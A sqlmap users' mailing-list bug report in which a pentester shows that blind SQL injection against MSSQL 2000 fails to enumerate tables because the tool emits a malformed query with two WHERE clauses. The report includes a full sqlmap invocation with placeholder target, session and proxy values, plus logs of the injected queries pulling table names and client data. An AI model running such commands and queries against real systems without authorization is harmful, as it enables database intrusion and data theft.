[sqlmap-users] Bug: Multiple result retrieval from MSSQL 2000 in Blind SQL mode fails

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

Hello,

While pentesting a client's solution, I discovered that sqlmap fails to
retrieve multiple entries (e.g. tables).

sql> select name from client
[14:32:40] [INFO] fetching SQL SELECT statement query output: 'select name
from client'
[14:32:40] [INPUT] can the SQL query provided return multiple entries? [Y/n]

[14:32:41] [INFO] query: SELECT ISNULL(CAST(COUNT(name) AS VARCHAR(8000)),
CHAR(32)) FROM client
[14:32:41] [INFO] retrieved: 14
[14:32:49] [INFO] performed 20 queries in 7 seconds
[14:32:49] [INPUT] the SQL query provided can return up to 14 entries. How
many entries do you want to retrieve?
[a] All (default)
[#] Specific number
[q] Quit
Choice: a
[14:32:51] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)),
CHAR(32)) FROM client WHERE name NOT IN (SELECT TOP 0 name FROM client)
[14:32:51] [INFO] retrieved: ValidResponse1
[14:33:17] [INFO] performed 69 queries in 26 seconds
[14:33:17] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)),
CHAR(32)) FROM client WHERE name NOT IN (SELECT TOP 1 name FROM client)
[14:33:17] [INFO] retrieved: ValidResponse2
...
[14:35:05] [INFO] retrieved: Restor^C
[14:35:24] [ERROR] user aborted

[*] shutting down at: 14:35:24

So far, works!
konrads@talon:~/sqlmap$ ./sqlmap.py --method="POST" --data="${DATA}" -p z4
-u "http://${IP}/${URL};jsessionid=${JSESSIONID}" --proxy="
http://localhost:8080" --string="${STRING}" -s somesession --sql-shell

    sqlmap/0.6.4-rc4 coded by Bernardo Damele A. G. <
ber...@gm...>
                        and Daniele Bellucci <dan...@gm...>

[*] starting at: 14:35:25

[14:35:25] [INFO] resuming ....
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, JSP
back-end DBMS: Microsoft SQL Server 2000

[14:35:26] [INFO] calling Microsoft SQL Server shell. To quit type 'x' or
'q' and press ENTER
sql>
sql> select name from sysobjects where xtype='U'
[14:36:11] [INFO] fetching SQL SELECT statement query output: 'select name
from sysobjects where xtype='U''
[14:36:11] [INPUT] can the SQL query provided return multiple entries? [Y/n]

[14:36:12] [INFO] query: SELECT ISNULL(CAST(COUNT(name) AS VARCHAR(8000)),
CHAR(32)) FROM sysobjects WHERE xtype=CHAR(85)
[14:36:12] [INFO] retrieved: 28
[14:36:19] [INFO] performed 20 queries in 7 seconds
[14:36:19] [INPUT] the SQL query provided can return up to 28 entries. How
many entries do you want to retrieve?
[a] All (default)
[#] Specific number
[q] Quit
Choice: a
[14:36:21] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)),
CHAR(32)) FROM sysobjects WHERE xtype=CHAR(85) WHERE name NOT IN (SELECT TOP
0 name FROM sysobjects WHERE xtype=CHAR(85))
[14:36:21] [INFO] retrieved:
[14:36:24] [INFO] performed 6 queries in 2 seconds
[14:36:24] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)),
CHAR(32)) FROM sysobjects WHERE xtype=CHAR(85) WHERE name NOT IN (SELECT TOP
1 name FROM sysobjects WHERE xtype=CHAR(85))
[14:36:24] [INFO] retrieved:
[14:36:26] [INFO] performed 6 queries in 2 seconds
[14:36:26] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)),
CHAR(32)) FROM sysobjects WHERE xtype=CHAR(85) WHERE name NOT IN (SELECT TOP
2 name FROM sysobjects WHERE xtype=CHAR(85))
[14:36:26] [INFO] retrieved:
[14:36:29] [INFO] performed 6 queries in 2 seconds
[14:36:29] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)),
CHAR(32)) FROM sysobjects WHERE xtype=CHAR(85) WHERE name NOT IN (SELECT TOP
3 name FROM sysobjects WHERE xtype=CHAR(85))
[14:36:29] [INFO] retrieved:
[14:36:31] [INFO] performed 6 queries in 2 seconds
[14:36:31] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)),
CHAR(32)) FROM sysobjects WHERE xtype=CHAR(85) WHERE name NOT IN (SELECT TOP
4 name FROM sysobjects WHERE xtype=CHAR(85))
[14:36:31] [INFO] retrieved: ^C
[14:36:32] [ERROR] user aborted

[*] shutting down at: 14:36:32

And so it goes on, without retrieving anything. --tables switch fails
equally.

However, doing a simple select name from sysobjects works.

[14:39:52] [INFO] calling Microsoft SQL Server shell. To quit type 'x' or
'q' and press ENTER
sql> select name from sysobjects
[14:39:56] [INFO] fetching SQL SELECT statement query output: 'select name
from sysobjects '
[14:39:56] [INPUT] can the SQL query provided return multiple entries? [Y/n]

[14:39:57] [INFO] query: SELECT ISNULL(CAST(COUNT(name) AS VARCHAR(8000)),
CHAR(32)) FROM sysobjects
[14:39:57] [INFO] retrieved: 86
[14:40:04] [INFO] performed 20 queries in 7 seconds
[14:40:04] [INPUT] the SQL query provided can return up to 86 entries. How
many entries do you want to retrieve?
[a] All (default)
[#] Specific number
[q] Quit
Choice:
[14:40:06] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)),
CHAR(32)) FROM sysobjects  WHERE name NOT IN (SELECT TOP 0 name FROM
sysobjects )
[14:40:06] [INFO] retrieved: Tbl1
[14:40:22] [INFO] performed 41 queries in 15 seconds
[14:40:22] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)),
CHAR(32)) FROM sysobjects  WHERE name NOT IN (SELECT TOP 1 name FROM
sysobjects )
[14:40:22] [INFO] retrieved: Tbl2

...

--
Konrads Smelkovs
Applied IT sorcery.